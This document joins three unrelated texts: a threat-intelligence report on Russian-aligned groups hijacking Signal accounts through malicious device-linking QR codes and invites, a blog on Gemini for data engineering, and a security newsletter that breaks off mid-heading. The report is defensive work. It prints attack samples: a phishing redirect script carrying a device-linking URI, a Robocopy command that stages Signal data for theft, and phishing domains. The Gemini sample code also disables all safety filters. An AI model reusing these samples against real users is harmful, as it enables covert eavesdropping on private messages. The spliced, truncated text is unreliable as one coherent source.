Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russian state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia’s intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia’s re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near term and proliferate to additional threat actors and regions outside the Ukrainian theater of war.
Signal’s popularity among common targets of surveillance and espionage activity—such as military personnel, politicians, journalists, activists, and other at-risk communities—has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats.
We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.
The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app’s legitimate “linked devices” feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim’s account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim’s secure conversations without the need for full-device compromise.
In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing instructions from the Signal website.
In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military.
Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), commonly known as the GRU) has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation.
Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time.
UNC5792: Modified Signal Group Invites
To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792 (which partially overlaps with CERT-UA’s UAC-0195) has altered legitimate “group invite” pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim’s Signal account.
In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite.
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., “sgnl://linkdevice?uuid=”), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain “signal-groups[.]tech”
function doRedirect() {
  if (window.location.hash) {
    var redirect = "sgnl://signal.group/" + window.location.hash
    document.getElementById('go-to-group').href = redirect
    window.location = redirect
  } else {
    document.getElementById('join-button').innerHTML = "No group found."
  }
}
window.onload = doRedirect
Figure 2: Typical legitimate group invite code for redirection to a Signal group
function doRedirect() {
  var redirect = 'sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D&pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B'
  //redirect=encodeURIComponent(redirect)
  document.getElementById('go-to-group').href = redirect
  window.location = redirect
}
window.onload = doRedirect
Figure 3: Example of UNC5792 modified redirect code used to link the victim’s device to an actor-controlled Signal instance
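For defenders, the hardcoded device-linking URI is itself a useful hunting signal: a legitimate group invite page should redirect to “sgnl://signal.group/…”, never to “sgnl://linkdevice”. As a purely illustrative defensive sketch (not tooling described in this report; the function name and regular expression are our own), fetched page content can be scanned for embedded device-linking URIs:

```python
import re

# Heuristic: a device-linking URI ("sgnl://linkdevice?uuid=...") appearing in
# page content that presents itself as a group invite is highly suspicious.
LINKDEVICE_RE = re.compile(r"sgnl://linkdevice\?[^\"'\s]*", re.IGNORECASE)

def find_linkdevice_uris(page_html: str) -> list[str]:
    """Return any Signal device-linking URIs found in fetched page content."""
    return LINKDEVICE_RE.findall(page_html)

# Example: a snippet resembling the modified redirect code above
sample = "var redirect = 'sgnl://linkdevice?uuid=abc%3D%3D&pub_key=xyz'"
print(find_linkdevice_uris(sample))
```

A match does not prove malice on its own, but it is a strong trigger for manual review of the hosting domain.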
UNC4221: Custom-Developed Signal Phishing Kit
UNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including:
Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4)
Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5)
In earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal (Figure 6)
Figure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain “signal-confirm[.]site”
Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at “teneta.add-group[.]site”. The page invites the user to “Sign in to Signal” (Ukrainian: “Авторизуватись у Signal”), which in turn displays a QR code linked to an UNC4221-controlled Signal instance.
Figure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host
Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser’s GeoLocation API. In general, we expect secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations.
Wider Russian and Belarusian Efforts to Steal Messages From Signal
Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices.
APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim’s Signal database and exfiltrate those most recent messages using Rclone (Figure 7).
As reported in 2023 by the Security Service of Ukraine (SSU) and the UK’s National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel, attributed by those organizations to Sandworm, is designed to recursively search Android devices for a list of file extensions, including the local databases of a series of messaging applications such as Signal.
Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).
Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9).
Figure 8: PowerShell script used by Turla to exfiltrate Signal messages
C:\Windows\system32\cmd.exe /C cd %appdata% && robocopy
"%userprofile%\AppData\Roaming\Signal" C:\Users\Public\data\signa /S
Figure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration
Outlook and Implications
The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity.
As reflected in wide-ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target’s unlocked device. Equally important, this threat is not limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence’s recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.
Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including:
Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps.
Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.
Audit linked devices regularly for unauthorized devices by navigating to the “Linked devices” section in the application’s settings.
Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action.
If available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.
iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface.
Indicators of Compromise
To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.
See Table 1 for a sample of relevant indicators of compromise.
Actor
Indicator of Compromise
Context
UNC5792
e078778b62796bab2d7ab2b04d6b01bf
Example of altered group invite HTML code
add-signal-group[.]com
add-signal-groups[.]com
group-signal[.]com
groups-signal[.]site
signal-device-off[.]online
signal-group-add[.]com
signal-group[.]com
signal-group[.]site
signal-group[.]tech
signal-groups-add[.]com
signal-groups[.]site
signal-groups[.]tech
signal-security[.]online
signal-security[.]site
signalgroup[.]site
signals-group[.]com
Fake group invite phishing pages
UNC4221
signal-confirm[.]site
confirm-signal[.]site
Device-linking instructions phishing page
signal-protect[.]host
Fake Signal security alert
teneta.join-group[.]online
teneta.add-group[.]site
group-teneta[.]online
helperanalytics[.]ru
teneta[.]group
group.kropyva[.]site
Fake Kropyva group invites
APT44
150.107.31[.]194:18000
Dynamically generated device-linking QR code provisioned by APT44
a97a28276e4f88134561d938f60db495
b379d8f583112cad3cf60f95ab3a67fd
b27ff24870d93d651ee1d8e06276fa98
WAVESIGN batch scripts
Table 1: Relevant indicators of compromise
See Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages.
Threat Actor
Tactic
Technique
UNC5792
Linked device
Remote phishing operations using fake group invites to pair a victim’s Signal messages to an actor-controlled device
UNC4221
Linked device
Remote phishing operations using fake military web applications and security alerts to pair a victim’s Signal messages to an actor-controlled device
APT44
Linked device
Close-access physical device exploitation to pair a victim’s Signal messages to an actor-controlled device
Signal Android database theft
Android malware (Infamous Chisel) tailored to exfiltrate Signal database files
Signal Desktop database theft
Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone
Turla
Signal Desktop database theft
Lightweight PowerShell script used in post-compromise activity in Windows environments to stage Signal Desktop messages for exfiltration
UNC1151
Signal Desktop database theft
Use of Robocopy to stage Signal Desktop file directories for exfiltration
Table 2: Summary of observed threat activity targeting Signal messages
In the realm of data engineering, generative AI models are quietly revolutionizing how we handle, process, and ultimately utilize data. For example, large language models (LLMs) can help with data schema handling, data quality, and even data generation.
Building upon the recently released Gemini in BigQuery Data preparation capabilities, this blog showcases areas where gen AI models are making a significant impact in data engineering with automated solutions for schema management, data quality automation, and generation of synthetic and structured data from diverse sources, providing practical examples and code snippets.
1. Data schema handling: Integrating new datasets
Data movement and maintenance is an ongoing challenge across all data engineering teams. Whether it’s moving data between systems with different schemas or integrating new datasets into existing data products, the process can be complex and error-prone. This is often exacerbated when dealing with legacy systems; in fact, 32% of organizations cite migrating the data and the app as their biggest challenge, according to Flexera’s 2024 State of the Cloud Report.
Gen AI models offer a powerful solution by assisting in automating schema mapping and transformation on an ongoing basis. Imagine migrating customer data from a legacy CRM system to a new platform, and combining it with additional external datasets in BigQuery. The schemas likely differ significantly, requiring intricate mapping of fields and data types. Gemini, our most capable AI model family to date, can analyze both schemas and generate the necessary transformation logic, significantly reducing manual effort and potential errors.
A common approach to data schema handling that we’ve seen from data engineering teams involves creating a lightweight application that receives messages from Pub/Sub, retrieves relevant dataset information from BigQuery and Cloud Storage, and uses the Vertex AI Gemini API to map source fields to target fields and assign a confidence score. Here is example code showing a FunctionDeclaration to perform the mapping-confidence task:
set_source_field_mapping_confidence_levels = generative_models.FunctionDeclaration(
    name="set_source_field_mapping_confidence_levels",
    description="""Sets the mapping confidence values for each source field for a given target field.

Here is a general example to help you understand how to use the set_source_field_mapping_confidences_tool correctly. This is only an example to show the source and target field structures:

Assuming you had previously decided on the following mapping confidence levels (but it is important that you come up with your own values for mapping confidence level rather than specifically using these values):
a mapping confidence level of 2 for the field with source_field_unique_ref=158
a mapping confidence level of 1 for the field with source_field_unique_ref=159
a mapping confidence level of 1 for the field with source_field_unique_ref=1290
a mapping confidence level of 1 for the field with source_field_unique_ref=579
a mapping confidence level of 1 for the field with source_field_unique_ref=638
a mapping confidence level of 1 for the field with source_field_unique_ref=970
a mapping confidence level of 1 for the field with source_field_unique_ref=3317
a mapping confidence level of 3 for the field with source_field_unique_ref=160
a mapping confidence level of 1 for the field with source_field_unique_ref=1910
a mapping confidence level of 5 for the field with source_field_unique_ref=2280

Then this function would be used to set the mapping confidence levels for each of the source fields, where your input parameter source_field_mapping_confidences would be:
source_field_mapping_confidences = [
    {'source_field_unique_ref': 158, 'mapping_confidence_level': '2'},
    {'source_field_unique_ref': 159, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 1290, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 579, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 638, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 970, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 3317, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 160, 'mapping_confidence_level': '3'},
    {'source_field_unique_ref': 1910, 'mapping_confidence_level': '1'},
    {'source_field_unique_ref': 2280, 'mapping_confidence_level': '5'}
]""",
    parameters={
        "type": "object",
        "properties": {
            "source_field_mapping_confidences": {
                "type": "array",
                "description": "A list of objects where each object in the list contains the source field's source_field_unique_ref, the mapping_confidence_level for that source field, and the reason for applying that mapping_confidence_level.",
                "items": {
                    "type": "object",
                    "properties": {
                        "source_field_unique_ref": {
                            "type": "integer",
                            "description": "The reference ID for the source field."
                        },
                        "mapping_confidence_level": {
                            "type": "string",
                            "enum": ["1", "2", "3", "4", "5"],
                            "description": "The confidence level for the mapping (an integer between 1 and 5)."
                        },
                        "mapping_confidence_level_reason": {
                            "type": "string",
                            "description": "The reason why the source field should have this mapping confidence level value."
                        }
                    },
                    "required": ["source_field_unique_ref", "mapping_confidence_level", "mapping_confidence_level_reason"]
                }
            },
        },
        "required": ["source_field_mapping_confidences"],
    },
)
As seen in the above prompt, Gemini assigns confidence levels to each mapping, which are then stored in BigQuery. Once these are in BigQuery, the data engineering team can validate high-confidence mappings (and eventually choose to fully automate these if they feel comfortable), and investigate the low-confidence mappings. This pipeline of gen AI tasks could be deployed in an event-driven architecture or could run on a batch basis. However, there’s usually a final step required, where a human approves the final output (this could eventually become fully automated over time, given the rapid release cadence of improvements in gen AI models). Here is an example architecture / workflow:
2. Data quality: Enhancing accuracy and consistency
In today’s data-driven world, poor data quality can cost businesses millions. From inaccurate customer insights leading to misguided marketing campaigns, to flawed financial reporting that impacts investment decisions, the consequences of bad data are significant. Gen AI models offer a new approach to data quality, going beyond traditional rule-based systems to identify subtle inconsistencies that can wreak havoc on your data pipelines. For example, imagine a system that can automatically detect and correct errors that would typically require hours of manual review or the crafting of complex regular expressions.
Gemini can augment your existing data quality checks in several ways:
Deduplication: Consider a scenario where you need to deduplicate customer profiles. Gemini can analyze various fields, such as names, addresses, and phone numbers, to identify potential duplicates, even when there are minor variations in spelling or formatting. For example, Gemini can recognize that “Robert Smith” and “Bob Smith” likely refer to the same individual, or that “123 Main St.” and “123 Main Street” represent the same address. In contrast to traditional methods like fuzzy matching, which are cumbersome to code and don’t always produce ideal results, using an LLM can provide a simpler and more effective solution.
Standardization: Gemini excels at standardizing data formats. Instead of relying on intricate regular expressions to validate data formats, Gemini can be used with prompt engineering, RAG, or fine-tuning to understand and enforce data quality rules in a more human-readable and maintainable way. This is particularly useful for fields like dates, times, and addresses, where variations in format can hinder analysis.
Subtle error detection: Gemini can identify subtle inconsistencies that might be missed by traditional methods. These include:
Variations in abbreviations (e.g., “St.” vs “Street”)
Different spellings of the same name (e.g., “Catherine” vs. “Katherine”)
Use of nicknames (e.g., “Bob” vs. “Robert”)
Incorrectly formatted phone numbers (e.g., missing area codes)
Inconsistent use of capitalization and punctuation
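To make the deduplication idea above concrete, the pieces around the model call can be sketched in Python. This is a minimal illustration with hypothetical names (`build_dedup_prompt`, `parse_dedup_verdict` are ours, not a library API); the actual Gemini call is omitted, and the example assumes you instruct the model to return a strict JSON verdict:

```python
import json

def build_dedup_prompt(rec_a: dict, rec_b: dict) -> str:
    """Hypothetical prompt builder: ask the model for a strict JSON verdict
    on whether two customer records refer to the same person."""
    return (
        "Do these two customer records refer to the same person? "
        'Respond with JSON only: {"same_person": true|false, "reason": "..."}\n'
        f"Record A: {json.dumps(rec_a)}\nRecord B: {json.dumps(rec_b)}"
    )

def parse_dedup_verdict(model_response: str) -> bool:
    """Parse the model's JSON verdict, tolerating a Markdown code fence."""
    cleaned = model_response.strip().removeprefix("```json").removesuffix("```").strip()
    return bool(json.loads(cleaned)["same_person"])

prompt = build_dedup_prompt(
    {"name": "Bob Smith", "address": "123 Main St."},
    {"name": "Robert Smith", "address": "123 Main Street"},
)
# A response like the following would be parsed into a boolean verdict:
assert parse_dedup_verdict('{"same_person": true, "reason": "nickname and abbreviation match"}')
```

Keeping the prompt construction and response parsing in plain, testable functions makes it easy to swap models or tighten the output contract later.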
Let’s illustrate this with a common example of address validation. We have a table named customer_addresses with the following format, and we want to check if the address_state column is a valid US state and convert it into the standard two-letter abbreviation:
Looking at the input data, you can easily identify some issues with the address_state column. For example, ‘Pennsylvaniaa’ is misspelled, and ‘Texas’ is written out instead of using the standard two-letter abbreviation. While these errors are obvious to a human, they can be challenging for traditional data quality tools to catch because they rely on exact matches or rigid rules, missing these subtle variations.
However, Gemini excels at understanding and interpreting human language, making it well suited for this task. With a simple prompt, Gemini can accurately identify these inconsistencies and standardize the state names into the correct format, going beyond rigid rules and adapting to nuances of the human language.
Here’s how you can use Gemini in BigQuery to perform this task, using the BQML function ML.GENERATE_TEXT, which lets you perform gen AI tasks on data stored in BigQuery using a remote connection to Gemini hosted in Vertex AI:
SELECT
  prompt,
  REPLACE(REPLACE(REPLACE(ml_generate_text_llm_result, 'json', ''), '\n', ''), '```', '') AS ml_generate_text_llm_result,
  address_id,
  address_line1,
  address_line2,
  address_city,
  address_state,
  address_zipcode,
  address_country
FROM
  ML.GENERATE_TEXT(
    MODEL `bigquery_demo.gemini-pro`,
    (
      SELECT
        CONCAT('Check if the given address_state field is as per the ANSI 2-letter standard. If not, convert it into the recommended format. Also check if the address_state is a valid US state. Return only the output with input, output and is_valid_us_state fields. address_state: ', address_state) AS prompt,
        *
      FROM
        `bigquery_demo.customer_addresses`
    ),
    STRUCT(TRUE AS flatten_json_output));
This code sends each address_state value to Gemini with a prompt asking it to validate and standardize the input. Gemini then returns a JSON response with the original input, the standardized output, and a boolean indicating whether the state is valid:
In this instance, Gemini has automated and streamlined our data quality process and reduced the complexity of the code. The first column contains the validation output — with a simple prompt, we are able to correctly identify the rows that have an invalid state column value and convert the state columns to a standard format. In the more traditional approach this would have taken multiple SQL expressions, external APIs, or joining with a lookup table.
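The nested REPLACE calls in the SQL above exist only to strip the Markdown code fence that the model sometimes wraps around its JSON output. If you post-process results outside BigQuery instead, the same cleanup is a couple of lines of Python; this is a sketch with a name of our choosing (`clean_llm_json`), not part of any SDK:

```python
import json

def clean_llm_json(raw: str) -> dict:
    """Strip a Markdown ```json fence (mirroring the nested REPLACEs in the
    SQL approach) and parse the remaining text as JSON."""
    cleaned = raw.replace("```", "").replace("json", "", 1).strip()
    return json.loads(cleaned)

raw_result = '```json\n{"input": "Texas", "output": "TX", "is_valid_us_state": true}\n```'
print(clean_llm_json(raw_result))
# → {'input': 'Texas', 'output': 'TX', 'is_valid_us_state': True}
```

Parsing to a real dict (rather than string manipulation alone) also surfaces malformed model output immediately as a `json.JSONDecodeError`, which is easier to alert on.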
The above example is just a glimpse into how Gemini can improve data quality. But beyond basic validation and standardization, gen AI models also excel at more nuanced tasks. For instance, they can classify data errors by severity (low, medium, high) for prioritized action and effectively handle mixed-language text fields by detecting language discrepancies. For more detailed examples check out this code repo, which includes how to leverage gen AI models for semantic search in BigQuery that you could use to identify duplicate records.
Important considerations for large datasets:
When working with large datasets, sending individual requests to an LLM like Gemini can become inefficient and may exceed usage quotas. To optimize performance and manage costs, consider batching requests and making sure your Google Cloud project has sufficient API quotas.
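One simple batching pattern is to validate many values per request instead of one. The sketch below (function names and prompt wording are our own, shown only to illustrate the idea) chunks rows and builds a single prompt per chunk:

```python
def batch_rows(rows: list[str], batch_size: int = 50) -> list[list[str]]:
    """Split rows into fixed-size batches so each LLM request validates
    many values at once instead of issuing one request per row."""
    return [rows[i:i + batch_size] for i in range(0, len(rows), batch_size)]

def build_batch_prompt(states: list[str]) -> str:
    """Hypothetical prompt asking for one JSON array covering a whole batch."""
    numbered = "\n".join(f"{i + 1}. {s}" for i, s in enumerate(states))
    return (
        "For each numbered address_state value below, return a JSON array of "
        'objects with "input", "output" (ANSI 2-letter code) and '
        '"is_valid_us_state" fields:\n' + numbered
    )

batches = batch_rows(["Texas", "Pennsylvaniaa", "CA", "NY"], batch_size=2)
print(len(batches))  # → 2
```

Batch size becomes a tuning knob: larger batches mean fewer requests, but each response is bigger and a single malformed reply affects more rows.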
3. Data generation: Unlocking insights from unstructured data
Unstructured data like images, videos, and PDFs hold valuable information that has historically been difficult to translate into structured data use cases. Gemini’s industry-leading multimodal context window of up to 2 million tokens allows us to extract structured data for downstream usage.
However, some gen AI models can be unreliable and prone to hallucinations, posing challenges for consistent data processing. To address this in practice, you can use Gemini’s system instructions, controlled generation, grounding with Gemini, and Vertex AI evaluation services. System instructions guide the model’s behavior, while controlled generation instructs the model to output in a specific format such as JSON and enforces structured outputs adhering to a predefined schema. Evaluation lets you automate the selection of the best response and provides associated quality metrics and explanations. Finally, grounding tethers the output to private or public up-to-date data, reducing the likelihood of the model inventing content. Then, the model’s structured data output can be integrated with BigQuery for downstream analysis and used in data pipelines and ML workflows, helping to ensure consistency and reliability in business applications.
Let’s take a look at an example inspired by the YouTube ABCDs, where we use one of the latest Gemini models, Gemini 2.0 Flash, to analyze an ad video on YouTube and see if it follows YouTube best practices, using the following prompt:
from google import genai
from google.genai import types


def generate():
    client = genai.Client(
        vertexai=True,
        project="YOUR_PROJECT_ID",
        location="us-central1",
    )

    text1 = types.Part.from_text("""You are a creative expert who analyzes and labels video ads to answer
specific questions about the content in the video and how it adheres to a set of features.
Answer the following questions with either "True" or "False" and provide a detailed explanation to
support your answer. The explanation should be thorough and logically sound, incorporating relevant
facts and reasoning. Only base your answers strictly on what information is available in the video
attached. Do not make up any information that is not part of the video.

These are the questions that you have to answer for each feature:
1. does the brand show in the first 5 seconds?
2. is there consistent brand presence throughout the ad video?
3. is there a clear call to action in the ad?""")
    video1 = types.Part.from_uri(
        file_uri="https://www.youtube.com/watch?v=OMVpP-Zam1A",
        mime_type="video/*",
    )

    model = "gemini-2.0-flash-exp"
    contents = [
        types.Content(
            role="user",
            parts=[text1, video1],
        )
    ]
    generate_content_config = types.GenerateContentConfig(
        temperature=1,
        top_p=0.95,
        max_output_tokens=8192,
        response_modalities=["TEXT"],
        safety_settings=[
            types.SafetySetting(category="HARM_CATEGORY_HATE_SPEECH", threshold="OFF"),
            types.SafetySetting(category="HARM_CATEGORY_DANGEROUS_CONTENT", threshold="OFF"),
            types.SafetySetting(category="HARM_CATEGORY_SEXUALLY_EXPLICIT", threshold="OFF"),
            types.SafetySetting(category="HARM_CATEGORY_HARASSMENT", threshold="OFF"),
        ],
        response_mime_type="application/json",
        response_schema={
            "type": "ARRAY",
            "items": {
                "type": "OBJECT",
                "properties": {
                    "id": {"type": "STRING"},
                    "name": {"type": "STRING"},
                    "category": {"type": "STRING"},
                    "criteria": {"type": "STRING"},
                    "detected": {"type": "BOOLEAN"},
                    "llm_explanation": {"type": "STRING"},
                },
                "required": ["id", "name", "category", "criteria", "detected", "llm_explanation"],
            },
        },
    )

    for chunk in client.models.generate_content_stream(
        model=model,
        contents=contents,
        config=generate_content_config,
    ):
        print(chunk, end="")


generate()
The resulting output can easily be ingested into BigQuery as structured data for further analytical and reporting uses:
[
  {
    "category": "Brand Presence",
    "criteria": "Does the brand show in the first 5 seconds?",
    "detected": true,
    "id": "brand_first_5_seconds",
    "llm_explanation": "The brand name Gemini shows up within the first 5 seconds of the video ad, clearly visible on the screen along with the text prompt that is shown.",
    "name": "Brand Visibility"
  },
  {
    "category": "Brand Presence",
    "criteria": "Is there consistent brand presence throughout the ad video?",
    "detected": true,
    "id": "consistent_brand_presence",
    "llm_explanation": "The brand name Gemini remains consistently visible in the upper left corner of the screen throughout the duration of the video ad, ensuring brand awareness.",
    "name": "Consistent Branding"
  },
  {
    "category": "Call to Action",
    "criteria": "Is there a clear call to action in the ad?",
    "detected": true,
    "id": "clear_call_to_action",
    "llm_explanation": "The video ad concludes by displaying a clear call to action directing viewers to GoogleStore.com to learn more, providing a direct path for engagement with the brand and product.",
    "name": "Call To Action"
  }
]
There are also considerations for choosing the right model for the right task. For example, larger videos or unstructured content may require the 2M-token context window available with Gemini Pro, whereas other tasks may be fine with the 1M-token context window of Gemini Flash.
You can also use Gemini to generate synthetic data that mimics real-world scenarios, augmenting your datasets and improving model performance. Synthetic data is artificially generated data that statistically mirrors real-world data while preserving privacy by excluding personally identifiable information (PII). This approach enables organizations to develop robust machine learning models and data-driven insights without the limitations and risks associated with using real-world data. The growing interest in synthetic data stems from its ability to address privacy concerns, overcome data scarcity, and facilitate test data generation across various industries. To learn more about synthetic data generation using gen AI, check out our in-depth blog about Generating synthetic data in BigQuery with Gretel.
Going to production: DataOps and the LLM pipeline
Once you’ve successfully implemented LLM-powered data engineering solutions, you’re ready to integrate them into your production environment. Here are a few things you’ll need to address:
Scheduling and automation: Leverage tools like Composer or Vertex AI Pipelines to schedule and automate gen AI tasks, to help ensure continuous data processing and analysis.
Model monitoring and evaluation: Implementing an evaluation pipeline to monitor the performance of your gen AI models allows you to track accuracy, identify potential biases, and trigger retraining when necessary.
Version control: Treat Gemini prompts and configurations as code, using version control systems to track changes and ensure reproducibility.
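One lightweight way to apply the version-control principle is to keep each prompt and its generation settings together in a single structure and derive a content hash from it, so any change shows up in code review and results can be traced back to an exact prompt version. A sketch under that assumption (the names here are illustrative, not a Google Cloud API):

```python
import hashlib
import json

# Treat the prompt and its generation settings as one versioned artifact.
PROMPT_CONFIG = {
    "prompt": "Extract the brand-presence criteria from this video ad.",
    "model": "gemini-2.0-flash-exp",
    "temperature": 1.0,
    "top_p": 0.95,
    "max_output_tokens": 8192,
}

def prompt_version(config: dict) -> str:
    """Stable short hash of a prompt config; changes whenever any field changes."""
    canonical = json.dumps(config, sort_keys=True)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:12]

print(prompt_version(PROMPT_CONFIG))
```

Logging this version identifier alongside each batch of generated rows makes results reproducible and regressions easy to bisect.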
The following resources are useful for integrating gen AI models into your data engineering production pipelines and delivering robust, scalable, and reliable solutions:
Transform your data engineering processes with gen AI
Gen AI is transforming the data engineering landscape, offering powerful capabilities for schema handling, data quality improvement, synthetic data generation, and data generation from unstructured sources. By embracing these advancements and adopting DataOps principles, get ready to unlock new levels of efficiency, accuracy, and insight from your data. Start experimenting with Gemini in your own data pipelines and unlock the potential for greater consistency in data processing, insights from new data sources, and ultimately, better business outcomes.
Welcome to the first Cloud CISO Perspectives for February 2025. Stephanie Kiel, our head of cloud security policy, government affairs and public policy, discusses two parallel and important security conversations she had at the Munich Security Conference, following our new reports on AI and cybercrime.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
–Phil Venables, VP, TI Security & CISO, Google Cloud
New AI, cybercrime reports underscore need for security best practices
By Stephanie Kiel, head of cloud security policy, government affairs and public policy, Google Cloud
Artificial intelligence has altered the world in a way that few technologies have, from how citizens procure goods, to the delivery of education and health services, to how digital networks are protected. Faced with operational pressures and resource constraints, malicious actors are turning to new methods of scaling their operations — including experimenting with AI and mobilizing cybercriminal communities by mixing ransomware development with intelligence collection.
These two evolutionary examples underscore the need for organizations to continue to prioritize and review security fundamentals as part of their risk-management posture.
Together these two new reports highlight four important themes:
Adversarial actors will continue to seek opportunities to use new technologies to their advantage.
Policymakers should consider mechanisms to enable bold and responsible innovation in the service of defense.
Innovation can help with defense, but strong network resilience practices should also be prioritized.
Collaboration across sectors and stakeholders remains key as organizations develop and implement their own risk management plans.
Adversaries and innovation
As technological advances occur, it is necessary to keep in mind that opportunistic malicious actors will also want to use them to their advantage. Our adversarial misuse of Gemini report suggests that threat actors are using Gemini for productivity gains, but Gemini’s built-in safeguards have prevented them from using Google’s AI capabilities for more disruptive purposes.
This underscores both the importance of developing AI capabilities safely and securely, and of enabling the use of such capabilities to the greatest extent possible in the service of cybersecurity.
Enabling defense
